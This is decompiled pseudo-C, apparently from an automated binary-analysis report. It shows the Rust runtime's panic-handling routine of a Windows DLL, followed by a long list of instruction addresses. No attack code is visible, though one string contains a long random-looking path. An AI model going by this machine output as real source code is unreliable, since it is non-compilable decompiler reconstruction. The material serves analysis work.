                                                                                                                                                                                      				void* _v140;
                                                                                                                                                                                      				intOrPtr _v144;
                                                                                                                                                                                      				signed int _v148;
                                                                                                                                                                                      				intOrPtr _v152;
                                                                                                                                                                                      				intOrPtr* _t190;
                                                                                                                                                                                      				void* _t194;
                                                                                                                                                                                      				void _t195;
                                                                                                                                                                                      				intOrPtr* _t196;
                                                                                                                                                                                      				signed int _t197;
                                                                                                                                                                                      				signed int _t199;
                                                                                                                                                                                      				char* _t201;
                                                                                                                                                                                      				long _t202;
                                                                                                                                                                                      				long _t203;
                                                                                                                                                                                      				void* _t204;
                                                                                                                                                                                      				void* _t205;
                                                                                                                                                                                      				long _t206;
                                                                                                                                                                                      				void _t209;
                                                                                                                                                                                      				void _t210;
                                                                                                                                                                                      				void* _t219;
                                                                                                                                                                                      				void* _t222;
                                                                                                                                                                                      				long _t226;
                                                                                                                                                                                      				void* _t235;
                                                                                                                                                                                      				void* _t245;
                                                                                                                                                                                      				void* _t247;
                                                                                                                                                                                      				void* _t248;
                                                                                                                                                                                      				char** _t251;
                                                                                                                                                                                      				char** _t252;
                                                                                                                                                                                      				void* _t256;
                                                                                                                                                                                      				void* _t260;
                                                                                                                                                                                      				void _t264;
                                                                                                                                                                                      				char _t265;
                                                                                                                                                                                      				signed char _t267;
                                                                                                                                                                                      				void _t270;
                                                                                                                                                                                      				intOrPtr _t273;
                                                                                                                                                                                      				void* _t275;
                                                                                                                                                                                      				char* _t276;
                                                                                                                                                                                      				void _t277;
                                                                                                                                                                                      				void* _t280;
                                                                                                                                                                                      				intOrPtr _t291;
                                                                                                                                                                                      				intOrPtr _t295;
                                                                                                                                                                                      				void _t298;
                                                                                                                                                                                      				long _t302;
                                                                                                                                                                                      				void* _t307;
                                                                                                                                                                                      				void* _t308;
                                                                                                                                                                                      				void* _t309;
                                                                                                                                                                                      				signed int _t310;
                                                                                                                                                                                      				signed int _t312;
                                                                                                                                                                                      				void* _t318;
                                                                                                                                                                                      				intOrPtr* _t324;
                                                                                                                                                                                      				long _t326;
                                                                                                                                                                                      				void* _t327;
                                                                                                                                                                                      				void* _t330;
                                                                                                                                                                                      				void* _t331;
                                                                                                                                                                                      				void* _t332;
                                                                                                                                                                                      				void* _t333;
                                                                                                                                                                                      				void* _t334;
                                                                                                                                                                                      				void* _t335;
                                                                                                                                                                                      				intOrPtr _t336;
                                                                                                                                                                                      				void* _t347;
                                                                                                                                                                                      				void* _t360;
                                                                                                                                                                                      				long _t361;
                                                                                                                                                                                      
                                                                                                                                                                                      				_v32 = _t336;
                                                                                                                                                                                      				_v20 = 0xffffffff;
                                                                                                                                                                                      				_v24 = E6E9E39A0;
                                                                                                                                                                                      				_t264 = _t270;
                                                                                                                                                                                      				_t332 = 1;
                                                                                                                                                                                      				_t330 = _t307;
                                                                                                                                                                                      				_v28 =  *[fs:0x0];
                                                                                                                                                                                      				 *[fs:0x0] =  &_v28;
                                                                                                                                                                                      				asm("lock xadd [0x6ea2e120], esi");
                                                                                                                                                                                      				_t190 = E6E9DD000(_t264, _t330);
                                                                                                                                                                                      				_t337 = _t190;
                                                                                                                                                                                      				if(_t190 == 0) {
                                                                                                                                                                                      					_t190 = E6E9F95A0(_t264,  &M6EA1F8F7, 0x46, _t337,  &_v68, 0x6ea1f870, 0x6ea1f9bc);
                                                                                                                                                                                      					_t336 = _t336 + 0xc;
                                                                                                                                                                                      					asm("ud2");
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t308 = _a8;
                                                                                                                                                                                      				_t273 =  *_t190 + 1;
                                                                                                                                                                                      				 *_t190 = _t273;
                                                                                                                                                                                      				if(_t332 < 0 || _t273 >= 3) {
                                                                                                                                                                                      					__eflags = _t273 - 2;
                                                                                                                                                                                      					if(__eflags <= 0) {
                                                                                                                                                                                      						_v124 = 0x6ea1f570;
                                                                                                                                                                                      						_v120 = 0x6ea1f824;
                                                                                                                                                                                      						_v68 = 0x6ea20260;
                                                                                                                                                                                      						_v64 = 2;
                                                                                                                                                                                      						_v96 = 0;
                                                                                                                                                                                      						_v100 = 0;
                                                                                                                                                                                      						_v60 = 0;
                                                                                                                                                                                      						_v116 = _a4;
                                                                                                                                                                                      						_v112 = _t308;
                                                                                                                                                                                      						_t309 =  &_v68;
                                                                                                                                                                                      						_v80 =  &_v124;
                                                                                                                                                                                      						_v76 = E6E9D2470;
                                                                                                                                                                                      						_v52 =  &_v80;
                                                                                                                                                                                      						_v48 = 1;
                                                                                                                                                                                      						_t194 = E6E9DD0F0( &_v100, __eflags);
                                                                                                                                                                                      						__eflags = _t194 - 3;
                                                                                                                                                                                      						if(_t194 == 3) {
                                                                                                                                                                                      							_v20 = 0;
                                                                                                                                                                                      							_v36 = _t309;
                                                                                                                                                                                      							 *((intOrPtr*)( *((intOrPtr*)(_t309 + 4))))( *_t309);
                                                                                                                                                                                      							_t336 = _t336 + 4;
                                                                                                                                                                                      							L11:
                                                                                                                                                                                      							_t332 = _v36;
                                                                                                                                                                                      							_t302 =  *(_t332 + 4);
                                                                                                                                                                                      							__eflags =  *(4 + _t302);
                                                                                                                                                                                      							if( *(4 + _t302) != 0) {
                                                                                                                                                                                      								_t256 =  *_t332;
                                                                                                                                                                                      								__eflags =  *((intOrPtr*)(_t302 + 8)) - 9;
                                                                                                                                                                                      								if( *((intOrPtr*)(_t302 + 8)) >= 9) {
                                                                                                                                                                                      									_t256 =  *(_t256 - 4);
                                                                                                                                                                                      								}
                                                                                                                                                                                      								HeapFree( *0x6ea2e128, 0, _t256);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t194 = HeapFree( *0x6ea2e128, 0, _t332);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t327 =  &_v68;
                                                                                                                                                                                      					_v68 = 0x6ea20224;
                                                                                                                                                                                      					_v64 = 1;
                                                                                                                                                                                      					_v60 = 0;
                                                                                                                                                                                      					_v52 = 0x6ea1f570;
                                                                                                                                                                                      					_v120 = 0;
                                                                                                                                                                                      					_v124 = 0;
                                                                                                                                                                                      					_v48 = 0;
                                                                                                                                                                                      					_t194 = E6E9DD0F0( &_v124, __eflags);
                                                                                                                                                                                      					__eflags = _t194 - 3;
                                                                                                                                                                                      					if(_t194 != 3) {
                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_v20 = 1;
                                                                                                                                                                                      						_v36 = _t327;
                                                                                                                                                                                      						 *((intOrPtr*)( *((intOrPtr*)(_t327 + 4))))( *_t327);
                                                                                                                                                                                      						_t336 = _t336 + 4;
                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_v132 = _t273;
                                                                                                                                                                                      					__imp__AcquireSRWLockShared(0x6ea2e11c);
                                                                                                                                                                                      					_v144 = 0x6ea2e11c;
                                                                                                                                                                                      					_v20 = 2;
                                                                                                                                                                                      					_v136 = _t264;
                                                                                                                                                                                      					_v140 = _t330;
                                                                                                                                                                                      					_t260 =  *((intOrPtr*)(_t330 + 0x10))(_t264);
                                                                                                                                                                                      					_t336 = _t336 + 4;
                                                                                                                                                                                      					_v36 = _t260;
                                                                                                                                                                                      					_v40 = _t308;
                                                                                                                                                                                      					_t194 = E6E9DD000(_t264, _t330);
                                                                                                                                                                                      					_t330 = _v40;
                                                                                                                                                                                      					_t340 = _t194;
                                                                                                                                                                                      					if(_t194 != 0) {
                                                                                                                                                                                      						L17:
                                                                                                                                                                                      						__eflags =  *_t194 - 1;
                                                                                                                                                                                      						_t275 = 1;
                                                                                                                                                                                      						if( *_t194 <= 1) {
                                                                                                                                                                                      							_t195 =  *0x6ea2e110; // 0x0
                                                                                                                                                                                      							_t310 = _a8;
                                                                                                                                                                                      							__eflags = _t195 - 2;
                                                                                                                                                                                      							if(_t195 == 2) {
                                                                                                                                                                                      								_t275 = 0;
                                                                                                                                                                                      								goto L19;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t195 - 1;
                                                                                                                                                                                      							if(_t195 == 1) {
                                                                                                                                                                                      								_t275 = 4;
                                                                                                                                                                                      								goto L19;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t195;
                                                                                                                                                                                      							if(_t195 != 0) {
                                                                                                                                                                                      								goto L19;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							E6E9DD380(_t264,  &_v68, _t330, _t332);
                                                                                                                                                                                      							_t330 = _v40;
                                                                                                                                                                                      							_t248 = _v68;
                                                                                                                                                                                      							__eflags = _t248;
                                                                                                                                                                                      							if(_t248 != 0) {
                                                                                                                                                                                      								goto L68;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t267 = 5;
                                                                                                                                                                                      							goto L86;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t310 = _a8;
                                                                                                                                                                                      						goto L19;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						E6E9F95A0(_t264,  &M6EA1F8F7, 0x46, _t340,  &_v68, 0x6ea1f870, 0x6ea1f9bc);
                                                                                                                                                                                      						_t336 = _t336 + 0xc;
                                                                                                                                                                                      						L61:
                                                                                                                                                                                      						asm("ud2");
                                                                                                                                                                                      						L62:
                                                                                                                                                                                      						_t276 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
                                                                                                                                                                                      						_t201 = 0xc;
                                                                                                                                                                                      						L21:
                                                                                                                                                                                      						_v100 = _t276;
                                                                                                                                                                                      						_v96 = _t201;
                                                                                                                                                                                      						_t202 =  *0x6ea2d044; // 0x0
                                                                                                                                                                                      						if(_t202 == 0) {
                                                                                                                                                                                      							_t280 = 0x6ea2d044;
                                                                                                                                                                                      							_t202 = E6E9E2960(_t264, 0x6ea2d044, _t330, _t332);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t194 = TlsGetValue(_t202);
                                                                                                                                                                                      						if(_t194 <= 1) {
                                                                                                                                                                                      							L42:
                                                                                                                                                                                      							_t203 =  *0x6ea2d044; // 0x0
                                                                                                                                                                                      							__eflags = _t203;
                                                                                                                                                                                      							if(_t203 == 0) {
                                                                                                                                                                                      								_t280 = 0x6ea2d044;
                                                                                                                                                                                      								_t203 = E6E9E2960(_t264, 0x6ea2d044, _t330, _t332);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t194 = TlsGetValue(_t203);
                                                                                                                                                                                      							__eflags = _t194;
                                                                                                                                                                                      							if(_t194 == 0) {
                                                                                                                                                                                      								_t204 =  *0x6ea2e128; // 0x720000
                                                                                                                                                                                      								__eflags = _t204;
                                                                                                                                                                                      								if(_t204 != 0) {
                                                                                                                                                                                      									L66:
                                                                                                                                                                                      									_t205 = HeapAlloc(_t204, 0, 0x10);
                                                                                                                                                                                      									__eflags = _t205;
                                                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                                                      										 *_t205 = 0;
                                                                                                                                                                                      										 *(_t205 + 0xc) = 0x6ea2d044;
                                                                                                                                                                                      										_t332 = _t205;
                                                                                                                                                                                      										_t206 =  *0x6ea2d044; // 0x0
                                                                                                                                                                                      										__eflags = _t206;
                                                                                                                                                                                      										if(_t206 == 0) {
                                                                                                                                                                                      											_v36 = _t332;
                                                                                                                                                                                      											_t206 = E6E9E2960(_t264, 0x6ea2d044, _t330, _t332);
                                                                                                                                                                                      											_t332 = _v36;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t194 = TlsSetValue(_t206, _t332);
                                                                                                                                                                                      										goto L75;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									L67:
                                                                                                                                                                                      									_t248 = E6E9F92F0(_t264, 0x10, 4, _t330, _t332, __eflags);
                                                                                                                                                                                      									asm("ud2");
                                                                                                                                                                                      									L68:
                                                                                                                                                                                      									_t326 = _v60;
                                                                                                                                                                                      									_t298 = _v64;
                                                                                                                                                                                      									__eflags = _t326 - 4;
                                                                                                                                                                                      									if(_t326 == 4) {
                                                                                                                                                                                      										__eflags =  *_t248 - 0x6c6c7566;
                                                                                                                                                                                      										if( *_t248 != 0x6c6c7566) {
                                                                                                                                                                                      											L83:
                                                                                                                                                                                      											_t332 = 2;
                                                                                                                                                                                      											_t267 = 0;
                                                                                                                                                                                      											__eflags = 0;
                                                                                                                                                                                      											L84:
                                                                                                                                                                                      											__eflags = _t298;
                                                                                                                                                                                      											if(_t298 != 0) {
                                                                                                                                                                                      												HeapFree( *0x6ea2e128, 0, _t248);
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L86:
                                                                                                                                                                                      											__eflags = _t267 - 5;
                                                                                                                                                                                      											_t310 = _a8;
                                                                                                                                                                                      											_t269 =  !=  ? _t332 : 1;
                                                                                                                                                                                      											_t275 =  !=  ? _t267 & 0x000000ff : 4;
                                                                                                                                                                                      											_t142 =  !=  ? _t332 : 1;
                                                                                                                                                                                      											_t264 =  *0x6ea2e110;
                                                                                                                                                                                      											 *0x6ea2e110 =  !=  ? _t332 : 1;
                                                                                                                                                                                      											L19:
                                                                                                                                                                                      											_v148 = _t310;
                                                                                                                                                                                      											_v128 = _t275;
                                                                                                                                                                                      											_t59 = _t330 + 0xc; // 0x6e9e3290
                                                                                                                                                                                      											_t196 =  *_t59;
                                                                                                                                                                                      											_v40 = _t196;
                                                                                                                                                                                      											_t197 =  *_t196(_v36);
                                                                                                                                                                                      											_t336 = _t336 + 4;
                                                                                                                                                                                      											_t312 = _t310 ^ 0x7ef2a91e | _t197 ^ 0xecc7bcf4;
                                                                                                                                                                                      											__eflags = _t312;
                                                                                                                                                                                      											if(__eflags != 0) {
                                                                                                                                                                                      												_t199 = _v40(_v36);
                                                                                                                                                                                      												_t336 = _t336 + 4;
                                                                                                                                                                                      												__eflags = _t312 ^ 0xe43a67d8 | _t199 ^ 0xbae7a625;
                                                                                                                                                                                      												if(__eflags != 0) {
                                                                                                                                                                                      													goto L62;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												_t251 = _v36;
                                                                                                                                                                                      												_t276 =  *_t251;
                                                                                                                                                                                      												_t201 = _t251[2];
                                                                                                                                                                                      												goto L21;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_t252 = _v36;
                                                                                                                                                                                      											_t276 =  *_t252;
                                                                                                                                                                                      											_t201 = _t252[1];
                                                                                                                                                                                      											goto L21;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t267 = 1;
                                                                                                                                                                                      										_t332 = 3;
                                                                                                                                                                                      										goto L84;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									__eflags = _t326 - 1;
                                                                                                                                                                                      									if(_t326 != 1) {
                                                                                                                                                                                      										goto L83;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									__eflags =  *_t248 - 0x30;
                                                                                                                                                                                      									if( *_t248 != 0x30) {
                                                                                                                                                                                      										goto L83;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t267 = 4;
                                                                                                                                                                                      									_t332 = 1;
                                                                                                                                                                                      									goto L84;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t204 = GetProcessHeap();
                                                                                                                                                                                      								__eflags = _t204;
                                                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                                                      									goto L67;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								 *0x6ea2e128 = _t204;
                                                                                                                                                                                      								goto L66;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t332 = _t194;
                                                                                                                                                                                      								__eflags = _t194 - 1;
                                                                                                                                                                                      								if(_t194 != 1) {
                                                                                                                                                                                      									L75:
                                                                                                                                                                                      									_t277 =  *(_t332 + 8);
                                                                                                                                                                                      									__eflags =  *_t332;
                                                                                                                                                                                      									_t136 = _t332 + 4; // 0x4
                                                                                                                                                                                      									_t330 = _t136;
                                                                                                                                                                                      									 *_t332 = 1;
                                                                                                                                                                                      									 *(_t332 + 4) = 0;
                                                                                                                                                                                      									 *(_t332 + 8) = 0;
                                                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                                                      										__eflags = _t277;
                                                                                                                                                                                      										if(__eflags != 0) {
                                                                                                                                                                                      											asm("lock dec dword [ecx]");
                                                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                                                      												_t194 = E6E9DC640(_t277);
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      									goto L26;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_v84 = 0;
                                                                                                                                                                                      								_v36 = 0;
                                                                                                                                                                                      								_t210 = 0;
                                                                                                                                                                                      								__eflags = 0;
                                                                                                                                                                                      								goto L47;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t330 = _t194;
                                                                                                                                                                                      							if( *_t194 != 1) {
                                                                                                                                                                                      								goto L42;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t330 = _t330 + 4;
                                                                                                                                                                                      							L26:
                                                                                                                                                                                      							if( *_t330 != 0) {
                                                                                                                                                                                      								E6E9F95A0(_t264, "already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd", 0x10, __eflags,  &_v68, 0x6ea1f860, 0x6ea1ff30);
                                                                                                                                                                                      								_t336 = _t336 + 0xc;
                                                                                                                                                                                      								goto L61;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							 *_t330 = 0xffffffff;
                                                                                                                                                                                      							_t332 =  *(_t330 + 4);
                                                                                                                                                                                      							if(_t332 == 0) {
                                                                                                                                                                                      								_v36 = _t330;
                                                                                                                                                                                      								_v20 = 8;
                                                                                                                                                                                      								_t247 = E6E9DC4D0(_t264, _t330, _t332);
                                                                                                                                                                                      								_t330 = _v36;
                                                                                                                                                                                      								_t332 = _t247;
                                                                                                                                                                                      								_t194 =  *(_t330 + 4);
                                                                                                                                                                                      								_t347 = _t194;
                                                                                                                                                                                      								if(_t347 != 0) {
                                                                                                                                                                                      									asm("lock dec dword [eax]");
                                                                                                                                                                                      									if(_t347 == 0) {
                                                                                                                                                                                      										_t280 =  *(_t330 + 4);
                                                                                                                                                                                      										_t194 = E6E9DC640(_t280);
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      								 *(_t330 + 4) = _t332;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							asm("lock inc dword [esi]");
                                                                                                                                                                                      							if(_t347 <= 0) {
                                                                                                                                                                                      								L16:
                                                                                                                                                                                      								asm("ud2");
                                                                                                                                                                                      								asm("ud2");
                                                                                                                                                                                      								goto L17;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								 *_t330 =  *_t330 + 1;
                                                                                                                                                                                      								_v84 = _t332;
                                                                                                                                                                                      								_v36 = _t332;
                                                                                                                                                                                      								if(_t332 != 0) {
                                                                                                                                                                                      									_t209 =  *(_t332 + 0x10);
                                                                                                                                                                                      									__eflags = _t209;
                                                                                                                                                                                      									_t280 =  ==  ? _t209 : _t332 + 0x10;
                                                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                                                      										L103:
                                                                                                                                                                                      										_t210 =  *_t280;
                                                                                                                                                                                      										_t280 =  *((intOrPtr*)(_t280 + 4)) - 1;
                                                                                                                                                                                      										L104:
                                                                                                                                                                                      										_v20 = 3;
                                                                                                                                                                                      										L47:
                                                                                                                                                                                      										_v124 = 0x6ea2010c;
                                                                                                                                                                                      										_v120 = 4;
                                                                                                                                                                                      										_v72 = 0;
                                                                                                                                                                                      										_v88 = 0;
                                                                                                                                                                                      										_v92 = 0;
                                                                                                                                                                                      										_v116 = 0;
                                                                                                                                                                                      										_v20 = 3;
                                                                                                                                                                                      										_t317 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
                                                                                                                                                                                      										_t212 =  !=  ? _t280 : 9;
                                                                                                                                                                                      										_v80 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
                                                                                                                                                                                      										_t318 =  &_v124;
                                                                                                                                                                                      										_v76 =  !=  ? _t280 : 9;
                                                                                                                                                                                      										_v68 =  &_v80;
                                                                                                                                                                                      										_v64 = 0x6e9ddca0;
                                                                                                                                                                                      										_v60 =  &_v100;
                                                                                                                                                                                      										_v56 = 0x6e9ddca0;
                                                                                                                                                                                      										_v52 =  &_v148;
                                                                                                                                                                                      										_v48 = E6E9DDCC0;
                                                                                                                                                                                      										_v108 =  &_v68;
                                                                                                                                                                                      										_v104 = 3;
                                                                                                                                                                                      										if(E6E9DD0F0( &_v92, _t210) == 3) {
                                                                                                                                                                                      											_v20 = 7;
                                                                                                                                                                                      											_v40 = _t318;
                                                                                                                                                                                      											 *((intOrPtr*)( *((intOrPtr*)(_t318 + 4))))( *_t318);
                                                                                                                                                                                      											_t336 = _t336 + 4;
                                                                                                                                                                                      											_t335 = _v40;
                                                                                                                                                                                      											_t295 =  *((intOrPtr*)(_t335 + 4));
                                                                                                                                                                                      											if( *((intOrPtr*)(_t295 + 4)) != 0) {
                                                                                                                                                                                      												_t245 =  *_t335;
                                                                                                                                                                                      												if( *((intOrPtr*)(_t295 + 8)) >= 9) {
                                                                                                                                                                                      													_t245 =  *(_t245 - 4);
                                                                                                                                                                                      												}
                                                                                                                                                                                      												HeapFree( *0x6ea2e128, 0, _t245);
                                                                                                                                                                                      											}
                                                                                                                                                                                      											HeapFree( *0x6ea2e128, 0, _t335);
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t265 = _v128;
                                                                                                                                                                                      										_t219 =  <  ? (_t265 + 0x000000fd & 0x000000ff) + 1 : 0;
                                                                                                                                                                                      										if(_t219 == 0) {
                                                                                                                                                                                      											__imp__AcquireSRWLockExclusive(0x6ea2e10c);
                                                                                                                                                                                      											_v68 = 0x6ea1fad0;
                                                                                                                                                                                      											_v64 = 1;
                                                                                                                                                                                      											_v152 = 0x6ea2e10c;
                                                                                                                                                                                      											_v41 = _t265;
                                                                                                                                                                                      											_v60 = 0;
                                                                                                                                                                                      											_v20 = 6;
                                                                                                                                                                                      											_v124 =  &_v41;
                                                                                                                                                                                      											_v120 = E6E9DDD30;
                                                                                                                                                                                      											_v52 =  &_v124;
                                                                                                                                                                                      											_v48 = 1;
                                                                                                                                                                                      											_t222 = E6E9DD0F0( &_v92, __eflags);
                                                                                                                                                                                      											_t333 =  &_v68;
                                                                                                                                                                                      											__imp__ReleaseSRWLockExclusive(0x6ea2e10c);
                                                                                                                                                                                      											__eflags = _t222 - 3;
                                                                                                                                                                                      											if(__eflags != 0) {
                                                                                                                                                                                      												goto L94;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_v20 = 5;
                                                                                                                                                                                      											_v40 = _t333;
                                                                                                                                                                                      											 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
                                                                                                                                                                                      											_t336 = _t336 + 4;
                                                                                                                                                                                      											goto L89;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											if(_t219 == 1) {
                                                                                                                                                                                      												L94:
                                                                                                                                                                                      												_t360 = _v36;
                                                                                                                                                                                      												if(_t360 != 0) {
                                                                                                                                                                                      													asm("lock dec dword [eax]");
                                                                                                                                                                                      													if(_t360 == 0) {
                                                                                                                                                                                      														E6E9DC640(_v84);
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      												_t334 = _v140;
                                                                                                                                                                                      												_t331 = _v136;
                                                                                                                                                                                      												_t361 = _v72;
                                                                                                                                                                                      												if(_t361 != 0) {
                                                                                                                                                                                      													asm("lock dec dword [eax]");
                                                                                                                                                                                      													if(_t361 == 0) {
                                                                                                                                                                                      														E6E9DDA70(_v72);
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__imp__ReleaseSRWLockShared(0x6ea2e11c);
                                                                                                                                                                                      												_t362 = _v132 - 1;
                                                                                                                                                                                      												_v20 = 0xffffffff;
                                                                                                                                                                                      												if(_v132 > 1) {
                                                                                                                                                                                      													_v68 = 0x6ea2029c;
                                                                                                                                                                                      													_v64 = 1;
                                                                                                                                                                                      													_v60 = 0;
                                                                                                                                                                                      													_v52 = 0x6ea1f570;
                                                                                                                                                                                      													_v76 = 0;
                                                                                                                                                                                      													_v80 = 0;
                                                                                                                                                                                      													_v48 = 0;
                                                                                                                                                                                      													_t226 = E6E9DD0F0( &_v80, _t362);
                                                                                                                                                                                      													_v120 =  &_v68;
                                                                                                                                                                                      													_v124 = _t226;
                                                                                                                                                                                      													E6E9DD2B0( &_v124);
                                                                                                                                                                                      													asm("ud2");
                                                                                                                                                                                      													asm("ud2");
                                                                                                                                                                                      												}
                                                                                                                                                                                      												_t280 = _t331;
                                                                                                                                                                                      												E6E9DD290(_t280, _t334);
                                                                                                                                                                                      												asm("ud2");
                                                                                                                                                                                      												goto L103;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											 *0x6ea2d040 = 0;
                                                                                                                                                                                      											_t356 =  *0x6ea2d040;
                                                                                                                                                                                      											if( *0x6ea2d040 == 0) {
                                                                                                                                                                                      												goto L94;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_t324 =  &_v68;
                                                                                                                                                                                      											_v68 = 0x6ea2017c;
                                                                                                                                                                                      											_v64 = 1;
                                                                                                                                                                                      											_v60 = 0;
                                                                                                                                                                                      											_v52 = 0x6ea1f570;
                                                                                                                                                                                      											_v48 = 0;
                                                                                                                                                                                      											_v20 = 3;
                                                                                                                                                                                      											if(E6E9DD0F0( &_v92, _t356) != 3) {
                                                                                                                                                                                      												goto L94;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_v40 = _t324;
                                                                                                                                                                                      											_v20 = 4;
                                                                                                                                                                                      											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
                                                                                                                                                                                      											_t336 = _t336 + 4;
                                                                                                                                                                                      											L89:
                                                                                                                                                                                      											_t291 =  *((intOrPtr*)(_v40 + 4));
                                                                                                                                                                                      											if( *((intOrPtr*)(_t291 + 4)) != 0) {
                                                                                                                                                                                      												_t235 =  *_v40;
                                                                                                                                                                                      												if( *((intOrPtr*)(_t291 + 8)) >= 9) {
                                                                                                                                                                                      													_t235 =  *(_t235 - 4);
                                                                                                                                                                                      												}
                                                                                                                                                                                      												HeapFree( *0x6ea2e128, 0, _t235);
                                                                                                                                                                                      											}
                                                                                                                                                                                      											HeapFree( *0x6ea2e128, 0, _v40);
                                                                                                                                                                                      											goto L94;
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t210 = 0;
                                                                                                                                                                                      									goto L104;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t210 = 0;
                                                                                                                                                                                      								goto L47;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}






























































































                                                                                                                                                                                      0x6e9dc70c
                                                                                                                                                                                      0x6e9dc70f
                                                                                                                                                                                      0x6e9dc716
                                                                                                                                                                                      0x6e9dc71d
                                                                                                                                                                                      0x6e9dc722
                                                                                                                                                                                      0x6e9dc727
                                                                                                                                                                                      0x6e9dc730
                                                                                                                                                                                      0x6e9dc733
                                                                                                                                                                                      0x6e9dc739
                                                                                                                                                                                      0x6e9dc741
                                                                                                                                                                                      0x6e9dc746
                                                                                                                                                                                      0x6e9dc748
                                                                                                                                                                                      0x6e9dc762
                                                                                                                                                                                      0x6e9dc767
                                                                                                                                                                                      0x6e9dc76a
                                                                                                                                                                                      0x6e9dc76a
                                                                                                                                                                                      0x6e9dc76e
                                                                                                                                                                                      0x6e9dc771
                                                                                                                                                                                      0x6e9dc774
                                                                                                                                                                                      0x6e9dc776
                                                                                                                                                                                      0x6e9dc7ea
                                                                                                                                                                                      0x6e9dc7ed
                                                                                                                                                                                      0x6e9dc84a
                                                                                                                                                                                      0x6e9dc851
                                                                                                                                                                                      0x6e9dc85b
                                                                                                                                                                                      0x6e9dc862
                                                                                                                                                                                      0x6e9dc869
                                                                                                                                                                                      0x6e9dc86d
                                                                                                                                                                                      0x6e9dc874
                                                                                                                                                                                      0x6e9dc87b
                                                                                                                                                                                      0x6e9dc881
                                                                                                                                                                                      0x6e9dc884
                                                                                                                                                                                      0x6e9dc887
                                                                                                                                                                                      0x6e9dc88d
                                                                                                                                                                                      0x6e9dc894
                                                                                                                                                                                      0x6e9dc897
                                                                                                                                                                                      0x6e9dc89e
                                                                                                                                                                                      0x6e9dc8a3
                                                                                                                                                                                      0x6e9dc8a5
                                                                                                                                                                                      0x6e9dc8ac
                                                                                                                                                                                      0x6e9dc8b4
                                                                                                                                                                                      0x6e9dc8b7
                                                                                                                                                                                      0x6e9dc8b9
                                                                                                                                                                                      0x6e9dc8bc
                                                                                                                                                                                      0x6e9dc8bc
                                                                                                                                                                                      0x6e9dc8bf
                                                                                                                                                                                      0x6e9dc8c2
                                                                                                                                                                                      0x6e9dc8c6
                                                                                                                                                                                      0x6e9dc8c8
                                                                                                                                                                                      0x6e9dc8ca
                                                                                                                                                                                      0x6e9dc8ce
                                                                                                                                                                                      0x6e9dc8d0
                                                                                                                                                                                      0x6e9dc8d0
                                                                                                                                                                                      0x6e9dc8dc
                                                                                                                                                                                      0x6e9dc8dc
                                                                                                                                                                                      0x6e9dc8ea
                                                                                                                                                                                      0x6e9dc8ea
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc8a5
                                                                                                                                                                                      0x6e9dc7f2
                                                                                                                                                                                      0x6e9dc7f5
                                                                                                                                                                                      0x6e9dc7fc
                                                                                                                                                                                      0x6e9dc803
                                                                                                                                                                                      0x6e9dc80a
                                                                                                                                                                                      0x6e9dc811
